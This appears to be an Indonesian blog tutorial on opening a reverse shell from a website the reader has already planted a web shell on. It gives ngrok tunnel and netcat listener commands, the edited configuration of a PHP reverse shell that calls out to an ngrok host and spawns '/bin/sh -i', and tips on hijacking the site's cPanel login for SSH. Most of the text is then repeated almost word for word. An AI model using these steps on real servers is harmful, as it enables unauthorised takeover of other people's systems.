Sebelum ke caranya, di termux harus sudah terinstall netcat dan ngrok, untuk php reverse shell bisa di donwload di situs pentestmonkey.net atau juga bisa download DISINI
Langkah pertama aktifkan terlebih dahulu vpn dan hotspot kamu, kemudian buka termux dan masukan perintah
$ ./ngrok tcp port
contoh : ./ngrok tcp 2012
jika ngrok sudah conncet maka tampilannya seperti di bawah ini
Langkah kedua bukalah session baru dan masukan perintah
$ netcat -lnvp port atau juga bisa dengan perintah nc -lnvp port
contoh : $ netcat -lnvp 2012
port netcat harus sama dengan port ngrok, jika di langkah pertama kamu memasukkan perintah $ ./ngrok tcp 2012 maka netcat juga harus menggunakan port 2012
Dan yang terakhir pergilah ke webshell untuk mengupload php reverse shellnya, edit di bagian ip dan portnya jika kamu donwload di situs pentestmonkey.net, tapi jika kamu donwload di link yang kusediakan tinggal rubah portnya saja, isi port yang disediakan ngrok bukan port yang digunakan untuk menjalankan ngrok
contoh ketika sudah di edit
set_time_limit (0);
$VERSION = "1.0";
$ip = '0.tcp.ngrok.io'; // CHANGE THIS
$port = 16883; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
sekarang jalanankan file dengan perintah php php-reverse-shell.php jika menggunakan shell yang ada fitur untuk menjalankan perintah
jika sukses web akan loading lama, dan lihatlah di session dimana kamu menjalankan netcat
sh: no job control in this shell
jangan berkecil hati bagi yang punya web yang hanya bisa di tanam mini shell, jika tempat upload filenya di public_html, maka untuk menjalankannya hanya perlu buka site.com/namafile.php, jika sukses tampilannya akan begini , disebagaian web mungkin beda
ketika sukses backconnect, kita berada di direktori / (direktori root folder), untuk berpindah direktori tinggal sesuaikan saja dengan nama direktori di webnya
contoh : cd /home/user/public_html
jika kedua cara diatas gagal, masih ada banyak cara untuk backconnect, tapi hanya itulah cara yang kutahu dan sukses backconnect, saranku sih jika webnya cpanelnya bisa di reset passwordnya, mending pakai cara itu, karena user dan password cpanel adalah user ssh, jadi bisa langsung remote servernya dengan ssh, dan jika semua masih gagal jangan menyerah, tetaplah berusaha dan mencoba.
Selamat mencoba !!
Langkah pertama aktifkan terlebih dahulu vpn dan hotspot kamu, kemudian buka termux dan masukan perintah
$ ./ngrok tcp port
contoh : ./ngrok tcp 2012
jika ngrok sudah conncet maka tampilannya seperti di bawah ini
$ netcat -lnvp port atau juga bisa dengan perintah nc -lnvp port
contoh : $ netcat -lnvp 2012
port netcat harus sama dengan port ngrok, jika di langkah pertama kamu memasukkan perintah $ ./ngrok tcp 2012 maka netcat juga harus menggunakan port 2012
contoh ketika sudah di edit
set_time_limit (0);
$VERSION = "1.0";
$ip = '0.tcp.ngrok.io'; // CHANGE THIS
$port = 16883; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
sh: no job control in this shell
jangan berkecil hati bagi yang punya web yang hanya bisa di tanam mini shell, jika tempat upload filenya di public_html, maka untuk menjalankannya hanya perlu buka site.com/namafile.php, jika sukses tampilannya akan begini , disebagaian web mungkin beda
contoh : cd /home/user/public_html
jika kedua cara diatas gagal, masih ada banyak cara untuk backconnect, tapi hanya itulah cara yang kutahu dan sukses backconnect, saranku sih jika webnya cpanelnya bisa di reset passwordnya, mending pakai cara itu, karena user dan password cpanel adalah user ssh, jadi bisa langsung remote servernya dengan ssh, dan jika semua masih gagal jangan menyerah, tetaplah berusaha dan mencoba.
Selamat mencoba !!
Komentar
Posting Komentar